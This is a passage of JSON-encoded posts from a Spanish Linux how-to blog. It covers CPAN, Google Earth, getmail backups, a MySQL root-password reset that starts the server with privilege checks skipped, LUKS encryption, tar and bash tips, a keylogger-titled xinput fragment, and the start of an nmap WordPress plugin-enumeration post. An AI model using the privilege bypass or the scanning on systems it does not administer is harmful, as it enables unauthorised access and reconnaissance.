de\nentrada:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ xinput list\n⎡ Virtual core pointer                      id=2    [master pointer  (3)]\n⎜   ↳ Virtual core XTEST pointer                id=4    [slave  pointer  (2)]\n⎜   ↳ SynPS/2 Synaptics TouchPad                id=15   [slave  pointer  (2)]\n⎣ Virtual core keyboard                     id=3    [master keyboard (2)]\n    ↳ Virtual core XTEST keyboard               id=5    [slave  keyboard (3)]\n    ↳ Power Button                              id=6    [slave  keyboard (3)]\n    ↳ Video Bus                                 id=7    [slave  keyboard (3)]\n    ↳ Power Button                              id=8    [slave  keyboard (3)]\n    ↳ Sleep Button                              id=9    [slave  keyboard (3)]\n    ↳ Laptop_Integrated_Webcam_2M               id=10   [slave  keyboard (3)]\n    ↳ AT Translated Set 2 keyboard              id=11   [slave  keyboard (3)]\n    ↳ Dell WMI hotkeys                          id=13   [slave  keyboard (3)]\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eTambién podemos obtener más información de algún dispositivo en\nconcreto, por ejemplo, del teclado, cuyo identificador, en mi caso, es\nel 11:\u003c/p\u003e","title":"¿Un keylogger en Ubuntu?"},{"content":"Una de las razones para querer instalar módulos del repositorio CPAN de Perl utilizando, a su vez, el módulo cpan, es que los módulos están más actualizados que en los paquetes de los repositorios. Para conseguirlo, podemos seguir los siguientes pasos\nNecesitamos tener instalado el paquete build-essential. Lanzamos la consola CPAN, con privilegios de administrador:\n$ sudo perl -MCPAN -e shell o también podríamos ejecutar:\n$ sudo cpan Si no tuviéramos permisos, parece que también es posible instalar módulos de Perl sin tener privilegios de administrador, mediante el módulo local::lib.\nUna vez en la consola CPAN, el comando help nos muestra información acerca de varios comandos disponibles.\ncpan\u0026gt; help Display Information (ver 1.9600) command argument description a,b,d,m WORD or /REGEXP/ about authors, bundles, distributions, modules i WORD or /REGEXP/ about any of the above ls AUTHOR or GLOB about files in the author\u0026#39;s directory (with WORD being a module, bundle or author name or a distribution name of the form AUTHOR/DISTRIBUTION) Download, Test, Make, Install... get download clean make clean make make (implies get) look open subshell in dist directory test make test (implies make) readme display these README files install make install (implies test) perldoc display POD documentation Upgrade r WORDs or /REGEXP/ or NONE report updates for some/matching/all modules upgrade WORDs or /REGEXP/ or NONE upgrade some/matching/all modules Pragmas force CMD try hard to do command fforce CMD try harder notest CMD skip testing Other h,? display this menu ! perl-code eval a perl command o conf [opt] set and query options q quit the cpan shell reload cpan load CPAN.pm again reload index load newer indices autobundle Snapshot recent latest CPAN uploads Ahora, seguimos los siguientes pasos. Ejecutamos:\ncpan\u0026gt; make install Actualizamos nuestro CPAN:\ncpan\u0026gt; install Bundle::CPAN Recargamos:\ncpan\u0026gt; reload cpan (CPAN.....................................v1.9600) (CPAN::Author..........v5.5001) (CPAN::CacheMgr.........v5.5001) (CPAN::Complete......v5.5) (CPAN::Debug.v5.5001) (CPAN::DeferredCode.v5.50) (CPAN::Distribution................................................................................v1.9602) (CPAN::Distroprefs..................................................v6) (CPAN::Distrostatus......v5.5) (CPAN::Exception::RecursiveDependency..v5.5) (CPAN::Exception::yaml_not_installed....v5.5) (CPAN::FTP..................v5.5005) (CPAN::FTP::netrc.....v1.01) (CPAN::HandleConfig..............v5.5003) (CPAN::Index...........v1.9600) (CPAN::InfoObj..........v5.5) (CPAN::LWP::UserAgent...v1.9600) (CPAN::Module...................................v5.5001) (CPAN::Prompt..v5.5) (CPAN::Queue............v5.5001) (CPAN::Shell...............................................................v5.5002) (CPAN::Tarzip...........v5.5011)(CPAN::Version........v5.5001) 398 subroutines redefined cpan shell -- CPAN exploration and modules installation (v1.9600) Enter \u0026#39;h\u0026#39; for help. Y ya podemos instalar cualquier módulo, por ejemplo:\ncpan\u0026gt; install IO::Pty::Easy Running install for module \u0026#39;IO::Pty::Easy\u0026#39; Running make for D/DO/DOY/IO-Pty-Easy-0.08.tar.gz Para terminar la sesión:\ncpan\u0026gt; exit Lockfile removed. Si queremos eliminar todos los módulos instalados basta con ejecutar:\n$ rm -fr ~/.cpan Las librerías de CPAN en los respositorios Si queremos instalar las librerías usando el gestor de paquetes:\n$ echo \u0026#34;XML::Simple\u0026#34; | perl -e \u0026#39;$x=\u0026lt;\u0026gt;; chomp($x); $x=~s/::/-/; $x=lc($x); print \u0026#34;lib$x-perl\u0026#34;\u0026#39; | xargs aptitude install Este comando obtiene el nombre de la librería de los repositorios que contiene el módulo XML::Simple, convirtiendo el nombre del módulo a minúsculas, reemplazando los \u0026ldquo;::\u0026rdquo; por \u0026ldquo;-\u0026rdquo; y añadiendo el prefijo \u0026ldquo;lib\u0026rdquo;.\n","permalink":"http://karpoke.ignaciocano.com/2011/07/22/instalar-modulos-de-cpan-usando-cpan/","summary":"\u003cp\u003eUna de las razones para querer instalar módulos del repositorio CPAN de\nPerl utilizando, a su vez, el módulo \u003ccode\u003ecpan\u003c/code\u003e, es que los módulos están\nmás actualizados que en los paquetes de los repositorios. Para\nconseguirlo, podemos seguir los siguientes pasos\u003c/p\u003e\n\u003cp\u003eNecesitamos tener instalado el paquete \u003ccode\u003ebuild-essential\u003c/code\u003e. Lanzamos la\nconsola CPAN, con \u003ca href=\"http://www.troubleshooters.com/codecorn/littperl/perlcpan.htm\"\u003eprivilegios de administrador\u003c/a\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo perl -MCPAN -e shell\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eo también podríamos ejecutar:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo cpan\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eSi no tuviéramos permisos, parece que también es posible \u003ca href=\"http://perl.jonallen.info/writing/articles/install-perl-modules-without-root\"\u003einstalar\nmódulos de Perl sin tener privilegios de administrador\u003c/a\u003e, mediante el\nmódulo \u003ccode\u003elocal::lib\u003c/code\u003e.\u003c/p\u003e","title":"Instalar módulos de CPAN usando CPAN"},{"content":"Ésta es la única manera en que me ha funcionado. Nada de bajar el .deb de su página—además de que, ahora mismo, baja el fichero GoogleEarthLinux.bin—, ni googleearth-package, ni gdebi, ni nada.\nBajamos el paquete estable y lo instalamos:\n$ wget https://dl-ssl.google.com/linux/direct/google-earth-stable_current_i386.deb $ sudo dpkg -i google-earth-stable_current_i386.deb Es posible que necesitemos el paquete lsb-core:\n$ sudo aptitude install lsb-core Si las fuentes de la interfaz gráfica se ven realmente mal, instalamos las fuentes de Microsoft (ADV).\n$ sudo aptitude install ttf-mscorefonts-installer Deberemos cerrar la sesión de usuario y volver a entrar para que los cambios en las fuentes tengan efecto.\n","permalink":"http://karpoke.ignaciocano.com/2011/07/15/instalar-google-earth-en-ubuntu-natty-narwhal/","summary":"\u003cp\u003eÉsta es la única manera en que me ha funcionado. Nada de \u003ca href=\"http://www.google.com/earth/download/ge/agree.html\"\u003ebajar el \u003ccode\u003e.deb\u003c/code\u003e\u003c/a\u003e\nde su página—además de que, ahora mismo, baja el fichero\n\u003ca href=\"http://mizaq.blogspot.com/2011/07/instalar-google-earth-en-ubuntu-1010.html\"\u003eGoogleEarthLinux.bin\u003c/a\u003e—, ni \u003ca href=\"http://help.ubuntu.com/community/GoogleEarth#Using%20make-googleearth-package\"\u003egoogleearth-package\u003c/a\u003e, ni\n\u003ca href=\"http://help.ubuntu.com/community/GoogleEarth#Installing%20the%20.deb%20file%20downloaded%20from%20the%20Google%20Earth%20Website\"\u003egdebi\u003c/a\u003e, ni \u003ca href=\"http://www.google.com/support/forum/p/earth/thread?tid=6f59e15bf811d4e2\u0026amp;hl=en\"\u003enada\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Google Earth\" loading=\"lazy\" src=\"/images/google-earth-300x178.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://blogs.udp.cl/instalar-google-earth-6012032-beta-en-ubuntu-1010-maverick\"\u003eBajamos el paquete estable\u003c/a\u003e y lo instalamos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ wget https://dl-ssl.google.com/linux/direct/google-earth-stable_current_i386.deb\n$ sudo dpkg -i google-earth-stable_current_i386.deb\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEs posible que necesitemos el paquete \u003ccode\u003elsb-core\u003c/code\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo aptitude install lsb-core\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eSi las fuentes de la interfaz gráfica se ven realmente mal, instalamos\nlas fuentes de Microsoft (ADV).\u003c/p\u003e","title":"Instalar Google Earth en Ubuntu Natty Narwhal"},{"content":"Hay otras maneras de realizar una copia de seguridad de GMail, como por ejemplo, usar Thunderbird, pero utilizar getmail tiene la ventaja de que es sencillo, puede realizar la copia en formato Maildir y no necesitamos utilizar ningún gestor de correo electrónico.\nMaildir y mbox Básicamente, en GNU/Linux hay dos maneras de guardar el correo electrónico, Maildir y mbox.\nMaildir Cada correo se guarda en un fichero por separado. Añadir, buscar y eliminar correos es rápido, no se necesita bloqueo en ninguna operación, se puede usar en sistemas de ficheros de red y no hay corrupción (exceptuando fallos de hardware). El inconveniente viene dado porque algunos sistemas de ficheros no gestionan eficientemente grandes cantidades de ficheros pequeños, además de que la búsqueda de texto, que requiere abrir todos los ficheros puede ser lenta.\nFuente: mattcutss.com\nmbox Todo el correo se guarda en un único fichero. La ventaja que tiene es que ampliamente soportado. Añadir y buscar un correo es rápido. Entre los inconvenientes están los problemas de bloqueo del fichero para cada operación (añadir, borrar y buscar), problemas cuando se usa en sistemas de ficheros de red y que el formato se corrompe fácilmente.\nFuente: mattcutss.com\nRealizar el backup Instalamos getmail:\n$ sudo aptitude install getmail4 Activamos POP3 en GMail. Vamos a Configuración del correo \u0026gt; Reenvío y POP \u0026gt; Activar POP para todo el correo.\nFuente: mail.google.com\nCreamos el directorio de configuración de getmail:\n$ mkdir ~/.getmail Y creamos el fichero ~/.getmail/getmail.gmail:\n[retriever] type = SimplePOP3SSLRetriever server = pop.gmail.com username = bob@gmail.com password = mypass [destination] type = Maildir path = ~/gmail-archive/ [options] # print messages about each action (verbose = 2) # Other options: # 0 prints only warnings and errors # 1 prints messages about retrieving and deleting messages only verbose = 2provocado por un cambio en las lib message_log = ~/.getmail/gmail.log Creamos los directorios donde se guardará el correo descargado:\n$ mkdir -p ~/gmail-archive/{cur,new,tmp} Ya podemos empezar con la copia getmail:\n$ getmail -r ~/.getmail/getmail.gmail El correo se bajará en tandas de pocos cientos, dado que GMail sólo permite descargar eso cada vez, por lo que deberemos repetir la operación unas cuantas veces.\nActualización a 1 de diciembre de 2015 Desde hace un tiempo, cuando voy a realizar la descarga de nuevos correos, empiezo a recibir errores del tipo:\nRetrieval error: server for SimplePOP3SSLRetriever:bob@gmail.com@pop.gmail.com:995 is broken; offered message GmailId3af2edcdc36d18d2 but failed to provide it. Please notify the administrator of the server. Skipping message... Al parece, se debe a un fallo que ha sido corregido a partir de la versión 4.48.0.\nReferencias » getmail documentation\n","permalink":"http://karpoke.ignaciocano.com/2011/07/08/copia-de-seguridad-de-gmail-con-getmail/","summary":"\u003cp\u003eHay otras maneras de realizar una \u003ca href=\"http://www.mattcutts.com/blog/backup-gmail-in-linux-with-getmail/\"\u003ecopia de seguridad de GMail\u003c/a\u003e, como\npor ejemplo, usar Thunderbird, pero utilizar \u003ccode\u003egetmail\u003c/code\u003e tiene la ventaja\nde que es sencillo, puede realizar la copia en formato Maildir y no\nnecesitamos utilizar ningún gestor de correo electrónico.\u003c/p\u003e\n\u003ch2 id=\"maildir-y-mbox\"\u003eMaildir y mbox\u003c/h2\u003e\n\u003cp\u003eBásicamente, en GNU/Linux hay dos maneras de guardar el correo\nelectrónico, \u003ca href=\"http://www.linuxmail.info/mbox-maildir-mail-storage-formats/\"\u003eMaildir y mbox\u003c/a\u003e.\u003c/p\u003e\n\u003ch3 id=\"maildir\"\u003eMaildir\u003c/h3\u003e\n\u003cp\u003eCada correo se guarda en un fichero por separado. Añadir, buscar y\neliminar correos es rápido, no se necesita bloqueo en ninguna operación,\nse puede usar en sistemas de ficheros de red y no hay corrupción\n(exceptuando fallos de hardware). El inconveniente viene dado porque\nalgunos sistemas de ficheros no gestionan eficientemente grandes\ncantidades de ficheros pequeños, además de que la búsqueda de texto, que\nrequiere abrir todos los ficheros puede ser lenta.\u003c/p\u003e","title":"Copia de seguridad de GMail con getmail"},{"content":"Para cambiar la contraseña de administrador en MySQL podemos iniciar el servicio utilizando los argumentos --skip-grant-tables, que permite iniciar el servicio sin tener en cuenta los privilegios del sistema, por lo que no es seguro, y el flag --skip-networing, que deshabilita las conexiones remotas pero no se lo impide a las locales, que seguirán teniendo acceso y lo harán como root, por lo que tampoco es seguro. Antes de ver cómo podemos hacerlo de otra manera, veremos cómo hacerlo con este método, que funciona siempre.\nMétodo genérico Paramos el servicio y lo iniciamos con los mencionados argumentos:\n$ sudo service mysql stop $ sudo mysqld --skip-grant-tables --skip-networking \u0026amp; Lanzamos el cliente de mysql y cambiamos la contraseña:\n$ mysql mysql\u0026gt; UPDATE mysql.user SET Password=PASSWORD(\u0026#39;contraseña\u0026#39;) WHERE User=\u0026#39;root\u0026#39;; Query OK, 2 rows affected (0.03 sec) Rows matched: 2 Changed: 2 Warnings: 0 mysql\u0026gt; FLUSH PRIVILEGES; Query OK, 0 rows affected (0.00 sec) mysql\u0026gt; exit Reiniciamos el servicio y probamos la nueva contraseña:\n$ sudo service mysql restart $ mysql -uroot -p Método mediante un fichero cargado al iniciar el servicio Por los motivos de seguridad descritos, lo mejor es lanzar el servicio indicándole que ejecute un archivo que contendrá el código para cambiar la contraseña:\nParamos el servicio:\n$ sudo service mysqld stop Creamos un archivo, por ejemplo ~/mysql-init, que contenga lo siguiente:\nUPDATE mysql.user SET Password=PASSWORD(\u0026#39;contraseña\u0026#39;) WHERE User=\u0026#39;root\u0026#39;; FLUSH PRIVILEGES; Iniciamos el servicio en modo seguro, que carga el archivo que acabamos de crear y le indicamos que lo haga como el usuario mysql. Si no le indicamos el usuario mysql, es posible que se modifique el propietario de algunos ficheros a root, por ejemplo ficheros de log, y que esto cause problemas.\n$ sudo mysqld_safe --init-file=~/mysql-init --user=mysql \u0026amp; Si todo ha ido bien, podremos conectarnos con la nueva contraseña:\n$ mysql -uroot -p Ahora, matamos el servicio (sin usar el argumento -9) y lo volvemos a iniciar normalmente:\n$ pgrep mysqld 25825 $ sudo kill 25825 $ sudo service mysql start Problemas y apparmor Si no podemos conectarnos y tenemos una Ubuntu, es posible que sea debido a apparmor. Lo podremos confirmar sin encontramos algo parecido a esto en /var/log/syslog:\nJul 8 11:09:26 hostname kernel: [11386.395693] type=1400 audit(1310288966.659:41): apparmor=\u0026#34;DENIED\u0026#34; operation=\u0026#34;open\u0026#34; parent=8723 profile=\u0026#34;/usr/sbin/mysqld\u0026#34; name=\u0026#34;/home/user/mysql-init\u0026#34; pid=8837 comm=\u0026#34;mysqld\u0026#34; requested_mask=\u0026#34;r\u0026#34; denied_mask=\u0026#34;r\u0026#34; fsuid=113 ouid=0 Para solucionarlo, editamos el fichero /etc/apparmor.d/usr.sbin.mysqld y añadimos la ruta a nuestro directorio de usuario:\n/home/user/ r, /home/user/** rwk, Reiniciamos apparmor para que tenga en cuenta este cambio:\n$ sudo service apparmor restart Volvemos a probar:\n$ sudo mysqld_safe --init-file=~/mysql-init --user=mysql \u0026amp; Probamos de nuevo:\n$ mysql -uroot -p Si todo ha ido bien, ya podemos matar el servicio mysqld y arrancarlo normalmente, eliminar el archivo ~/mysql-init, eliminar los cambios hechos en la configuración de apparmor y reiniciar éste para que tengan efecto.\n","permalink":"http://karpoke.ignaciocano.com/2011/07/08/cambiar-la-contrasena-de-administrador-en-mysql-5-1/","summary":"\u003cp\u003ePara \u003ca href=\"http://dev.mysql.com/doc/refman/5.1/en/resetting-permissions.html#resetting-permissions-generic\"\u003ecambiar la contraseña de administrador en MySQL\u003c/a\u003e podemos iniciar\nel servicio utilizando los argumentos \u003ccode\u003e--skip-grant-tables\u003c/code\u003e, que permite\niniciar el servicio sin tener en cuenta los privilegios del sistema, por\nlo que no es seguro, y el flag \u003ccode\u003e--skip-networing\u003c/code\u003e, que deshabilita las\nconexiones remotas pero no se lo impide a las locales, que seguirán\nteniendo acceso y lo harán como \u003ccode\u003eroot\u003c/code\u003e, por lo que tampoco es seguro.\nAntes de ver cómo podemos hacerlo de otra manera, veremos cómo hacerlo\ncon este método, que funciona siempre.\u003c/p\u003e","title":"Cambiar la contraseña de administrador en MySQL 5.1"},{"content":"Tenemos un disco duro externo y queremos cifrarlo. El comando cryptsetup, que se encuentra en los repositorios, hace uso de DM-Crypt, que es la parte del kernel que se encarga del cifrado de discos, y LUKS, un estándar independiente de la plataforma y del software para acceder a volúmenes cifrados.\nRequisitos El primer paso, después de instalar el comando, es tener claro qué dispositivo es nuestro disco duro. Un vistazo mediante fdisk debería ser suficiente. Además, si está montado, lo desmontamos.\nVamos a comprobar que el disco no tiene errores. Primero, averiguamos el tamaño de bloque:\n$ sudo tune2fs -l /dev/sdb1 | grep -i \u0026#39;Block size\u0026#39; Block size: 4096 Lanzamos el comando badblocks para comprobar los errores:\n$ sudo badblocks -s -w /dev/sdb1 -b 4096 Este comando se dedica a escribir una serie de patrones en el disco y después leerlos para asegurarse de que no hay problemas, y por este motivo es muy lento. Con el argumento -t se utiliza una sola pasada con un patrón aleatorio: más rápido pero menos preciso.\nEl siguiente paso es llenar el disco de datos aleatorios para protegerse de ataques criptográficos. El siguiente comando realiza 3 pasadas sobre el disco:\n$ sudo shred -n 3 -v /dev/sdb1 El número de pasadas dependerá de la paranoia de cada uno. En lugar de shred, que toma los datos pseudoaleatorios de /dev/urandom, podríamos utilizar dd, que es realmente aleatorio ya que los toma de /dev/random, y también tarda más:\n$ sudo dd if=/dev/random of=/dev/sdb1 bs=4096 Cifrado Ya estamos listos para cifrar la partición:\n$ sudo cryptsetup --verify-passphrase -c aes -h sha256 -y -s 256 luksFormat /dev/sdb1 Las opciones pasadas indican que pida la contraseña dos veces, un cifrado AES con clave de 256 bits y algoritmo SHA-256. Si nos da el error:\nCheck kernel for support for the aes-cbc-plain cipher spec and verify that /dev/sdb6 contains at least 258 sectors es que debemos cargar el módulo dm-crypt:\n$ sudo modprobe dm-crypt Para que se cargue cada vez que arranque el sistema, nos aseguramos de que el fichero /etc/modules contiene la línea:\ndm-crypt Particionado Para montar la interfaz al disco cifrado ejecutamos:\n$ sudo cryptsetup luksOpen /dev/sdb1 crypthd Esto no es lo mismo que montar el disco. Este comando crea un dispositivo que hará de interfaz al disco cifrado y que se encuentra en /dev/mapper/crypthd. El nombre crythd lo escogemos nosotros.\nFormateamos:\n$ sudo mkfs.ext4 -L crypthd -m 1 /dev/mapper/cryptd Con el argumento -L especificamos la etiqueta para la unidad, con lo que al montarlo automáticamente se utilizará este nombre. El argumento -m es el tanto por cierto de espacio reservado para el administrador.\nPara desmontar la interfaz:\n$ sudo cryptsetup luksClose /dev/mapper/crypthd Montando y desmontando En el terminal Para usar el disco, primero hay que montar la interfaz y luego el disco. Suponemos que el directorio /media/crypthd ya ha sido creado. También cambiaremos los permisos para que pueda ser usado por nuestro usuario:\n$ sudo cryptsetup luksOpen /dev/sdb1 crypthd $ sudo mount /dev/mapper/crypthd /media/crypthd $ sudo chown -R $USER:$USER /media/crypthd Para desmontar el disco hay que hacerlo en el orden inverso:\n$ sudo umount /media/crypthd $ sudo cryptsetup luksClose /dev/mapper/crypthd En el escritorio Si lo usamos en un entorno de escritorio, podemos aprovecharnos de que el disco se montará automáticamente. No será necesario haber creado el directorio /media/crypthd por lo que, con el disco desmontado, lo podemos borrar.\nCada vez que conectemos el disco nos saldrá el cuadro de diálogo que nos pedirá la contraseña para montar la inferfaz al disco y si introducimos la correcta, lo montará en el directorio esperado.\nLa primera vez que lo montemos de esta manera, habrá que modificar los permisos del directorio para que tengamos permisos de escritura:\n$ sudo chmod 775 /media/crypthd $ sudo chgrp adm /media/crypthd ","permalink":"http://karpoke.ignaciocano.com/2011/07/08/cifrar-una-particion-o-un-disco-duro-externo/","summary":"\u003cp\u003eTenemos \u003ca href=\"http://conocimientoabierto.es/traducir-automaticamente-ficheros-po/207/\"\u003eun disco duro externo y queremos cifrarlo\u003c/a\u003e. El comando\n\u003ccode\u003ecryptsetup\u003c/code\u003e, que se encuentra en los repositorios, hace uso de\nDM-Crypt, que es la parte del kernel que se encarga del cifrado de\ndiscos, y LUKS, un estándar independiente de la plataforma y del\nsoftware para acceder a volúmenes cifrados.\u003c/p\u003e\n\u003ch2 id=\"requisitos\"\u003eRequisitos\u003c/h2\u003e\n\u003cp\u003eEl primer paso, después de instalar el comando, es tener claro qué\ndispositivo es nuestro disco duro. Un vistazo mediante \u003ccode\u003efdisk\u003c/code\u003e debería\nser suficiente. Además, si está montado, lo desmontamos.\u003c/p\u003e","title":"Cifrar una partición o un disco duro externo"},{"content":"\nFirefox \u0026gt; Menú Editar \u0026gt; Preferencias \u0026gt; Privacidad \u0026gt; No deseo ser rastreado\nUn pequeño listado de complementos para Firefox para proteger nuestra privacidad:\n» No-Script, bloquea la ejecución de Javascript, Java, Flash,\nSilverlight y otros » Ghostery, bloquea aquellos servicios que recolectan información\nprivada y del comportamiento del usuario » BetterPrivacy, bloquea las cookies de Flash » Foxy Proxy, permite cambiar entre proxies basándose en reglas\ny de forma automática » DuckDuckGo, incluye al buscador DuckDuckGo, el cual\npresumiblemente [no registra información][] sobre los usuarios, en la lista de buscadores Otros complementos:\n» HTTP-Everywhere, permite realizar una conexión segura al servidor web,\nsiempre que ésta esté disponible » Blacksheep, nos alerta si un usuario está utilizando Firesheep en la misma red\n","permalink":"http://karpoke.ignaciocano.com/2011/07/02/i-do-not-want-to-be-tracked/","summary":"\u003cp\u003e\u003cimg alt=\"firefox-preferences-privacy-tracking\" loading=\"lazy\" src=\"/images/firefox-preferences-privacy-tracking-300x72.png\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eFirefox \u0026gt; Menú Editar \u0026gt; Preferencias \u0026gt; Privacidad \u0026gt; No deseo ser\nrastreado\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eUn pequeño listado de \u003ca href=\"http://usemoslinux.blogspot.com/2011/07/las-5-mejores-extensiones-de-firefox.html\"\u003ecomplementos para Firefox para proteger nuestra\nprivacidad\u003c/a\u003e:\u003c/p\u003e\n\u003cp\u003e» \u003ca href=\"http://addons.mozilla.org/es-ES/firefox/addon/noscript/\"\u003eNo-Script\u003c/a\u003e, bloquea la ejecución de Javascript, Java, Flash,\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eSilverlight y otros\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e» \u003ca href=\"http://addons.mozilla.org/es-ES/firefox/addon/ghostery/\"\u003eGhostery\u003c/a\u003e, bloquea aquellos servicios que recolectan información\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eprivada y del comportamiento del usuario\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e» \u003ca href=\"http://addons.mozilla.org/es-ES/firefox/addon/betterprivacy/\"\u003eBetterPrivacy\u003c/a\u003e, bloquea las cookies de Flash\n» \u003ca href=\"http://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/contribute/roadblock/?src=browse\u0026amp;version=3.0.1\"\u003eFoxy Proxy\u003c/a\u003e, permite cambiar entre \u003cem\u003eproxies\u003c/em\u003e basándose en reglas\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ey de forma automática\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e» \u003ca href=\"http://addons.mozilla.org/es-ES/firefox/addon/duck-duck-go-ssl-search-plugin/\"\u003eDuckDuckGo\u003c/a\u003e, incluye al buscador \u003ca href=\"http://duckduckgo.com/\"\u003eDuckDuckGo\u003c/a\u003e, el cual\u003c/p\u003e","title":"I do not want to be tracked"},{"content":"Un día estás editando un archivo en un servidor remoto, por ssh, y, a la hora de guardar, te das cuenta de que has editado el fichero sin tener los privilegios suficientes, por lo que vim se queja:\nE505: \u0026#34;app.config\u0026#34; is read-only (add ! to override) La solución es sencilla, para guardarlo como root escribes:\n:w !sudo tee % O eso creías. De repente, te das cuenta de que eso no es lo que has escrito, porque vim se ha puesto en modo inferno, y cada tecla que pulsas le da vida propia, porque hace exactamente lo que le dices que haga y no lo que realmente quieres que haga, y cuando pasa la tormenta y vuelves a editar el fichero, sólo contiene:\n:wq WTF!\nNo pasa nada, tienes copias de seguridad. Una vez que encuentras la copia, backup.tgz, quieres buscar el fichero en cuestión:\n$ tar tvf backup.tgz | grep app.config -rw-r--r-- user/user 10458 2011-06-30 13:11 home/user/projects/django/projectname/myapp/app.config Para descomprimir únicamente ese fichero:\n$ tar xvzf backup.tgz home/user/projects/django/projectname/myapp/app.config home/user/projects/django/projectname/myapp/app.config Si no queremos que nos cree todos esos directorios intermedios, podemos usar el argumento -O, que vuelca el contenido a la salida estándar:\n$ tar xvzf backup.tgz home/user/projects/django/projectname/myapp/app.config -O | tee app.config ","permalink":"http://karpoke.ignaciocano.com/2011/06/30/extraer-un-archivo-de-un-archivo-comprimido-desde-el-terminal/","summary":"\u003cp\u003eUn día estás editando un archivo en un servidor remoto, \u003ca href=\"/2011/06/17/compartiendo-una-conexion-por-ssh/\"\u003epor \u003ccode\u003essh\u003c/code\u003e\u003c/a\u003e,\ny, a la hora de guardar, te das cuenta de que has editado el fichero sin\ntener los privilegios suficientes, por lo que \u003ccode\u003evim\u003c/code\u003e se queja:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eE505: \u0026#34;app.config\u0026#34; is read-only (add ! to override)\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eLa solución es sencilla, para guardarlo como \u003ccode\u003eroot\u003c/code\u003e escribes:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e:w !sudo tee %\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eO eso creías. De repente, te das cuenta de que eso no es lo que has\nescrito, porque \u003ccode\u003evim\u003c/code\u003e se ha puesto en modo \u003cem\u003einferno\u003c/em\u003e, y cada tecla que\npulsas le da vida propia, porque hace exactamente lo que le dices que\nhaga y no lo que realmente quieres que haga, y cuando pasa la tormenta y\nvuelves a editar el fichero, sólo contiene:\u003c/p\u003e","title":"Extraer un archivo de un archivo comprimido, desde el terminal"},{"content":"Las variables variables se utilizan cuando queremos tener nombres de variables que puedan usarse y modificarse de forma dinámica. PHP permite su uso de forma directa:\n\u0026lt;?php $a = \u0026#39;hello\u0026#39;; ?\u0026gt; Una variable variable toma el valor de una variable y lo usa para el nombre de la variable. Podemos utilizar \u0026ldquo;hello\u0026rdquo; como nombre de variable utilizando dos signos de dólar:\n\u0026lt;?php $$a = \u0026#39;world\u0026#39;; ?\u0026gt; En este punto tenemos dos variables, $a que contiene \u0026ldquo;hello\u0026rdquo; y $hello que contiene \u0026ldquo;world\u0026rdquo;. Así, las siguientes instrucciones escriben \u0026ldquo;hello world\u0026rdquo;:\n\u0026lt;?php echo \u0026#34;$a ${$a}\u0026#34;; echo \u0026#34;$a $hello\u0026#34;; ?\u0026gt; En Bash También podemos conseguir variables variables en Bash:\n$ a=hello $ b=a $ echo $a ${!b} hello hello Algunos tipos de shell, como ksh, no aceptan la sintaxis anterior, pero podemos recurrir a eval para conseguir el mismo resultado:\n$ a=hello $ b=a $ eval echo $a \\$$b hello hello De la misma forma que en el ejemplo en PHP, podemos declarar la variable variable al tiempo que se asignamos un valor:\n$ a=hello $ eval $a=world $ eval echo $a \\$$a hello world ","permalink":"http://karpoke.ignaciocano.com/2011/06/29/variables-variables-en-bash/","summary":"\u003cp\u003eLas variables variables se utilizan cuando queremos tener nombres de\nvariables que puedan usarse y modificarse de forma dinámica. \u003ca href=\"http://php.net/manual/en/language.variables.variable.php\"\u003ePHP\npermite su uso\u003c/a\u003e de forma directa:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e\u0026lt;?php\n$a = \u0026#39;hello\u0026#39;;\n?\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eUna variable variable toma el valor de una variable y lo usa para el\nnombre de la variable. Podemos utilizar \u0026ldquo;hello\u0026rdquo; como nombre de variable\nutilizando dos signos de dólar:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e\u0026lt;?php\n$$a = \u0026#39;world\u0026#39;;\n?\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEn este punto tenemos dos variables, \u003ccode\u003e$a\u003c/code\u003e que contiene \u0026ldquo;hello\u0026rdquo; y\n\u003ccode\u003e$hello\u003c/code\u003e que contiene \u0026ldquo;world\u0026rdquo;. Así, las siguientes instrucciones\nescriben \u0026ldquo;hello world\u0026rdquo;:\u003c/p\u003e","title":"Variables variables en Bash"},{"content":"Hay un script para nmap, http-wp-plugins, que permite detectar los complementos instalados en WordPress.\nDicho script intenta acceder a los directorios de los complementos en wp-content/plugins/ con la ayuda de un diccionario. Si la respuesta no es un error 404 interpreta que el directorio, y por tanto el complemento, existe. La lista de complementos para WordPress es extensa, casi 13405 entradas, y podría llevar bastante tiempo analizarlas todas, por lo que las entradas están ordenadas por popularidad y por defecto sólo se escanean las 100 primeras.\nInstalación y uso Después de bajarnos el diccionario, lo descomprimimos en el directorio /usr/share/nmap/nselib/data, o en el directorio nselib/data relativo a donde tengamos instalado nmap, y ya podemos probar el complemento:\n$ nmap -p80 